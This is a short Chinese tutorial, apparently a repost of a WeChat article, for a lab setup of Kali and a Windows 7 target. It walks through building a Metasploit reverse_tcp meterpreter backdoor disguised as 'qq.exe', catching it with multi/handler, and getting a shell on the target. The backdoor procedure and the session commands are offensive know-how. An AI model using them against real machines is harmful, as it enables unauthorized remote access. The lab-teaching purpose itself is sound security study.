#############################
免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。
##############################
kali 172.18.5.118
靶机 172.18.5.240
先尝试能不能ping通
好的可以 那我们进行下一步
0X01爱之初体验
先在kali终端输入msfvenom -l,打开payload目录
然后找到payload windows/meterpreter/reverse_tcp
输入以下命令生成后门qq.exe
然后将生成的qq.exe移到靶机中,然后打开msfconsole
使用该攻击模块监听 use exploit/multi/handler
然后设置payload
在show options 发现还有未设置的
设置LHOST为kali地址
然后run开始监听
这时我们打开靶机的qq.exe文件就能看到Kali这边获取到一个Session
输入jobs退出,继续输入sessions -l查看session列表
这里有一个session列表,sessionid为1
我们输入sessions -i 1,与该session交互
输入getuid查看用户信息
输入systinfo获取系统信息
输入shell即可获取win7的shell
不过用这样方式拿的shell普遍都是很低的,还需提权
原文始发于微信公众号(菜鸟小新):msf生成后门拿shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论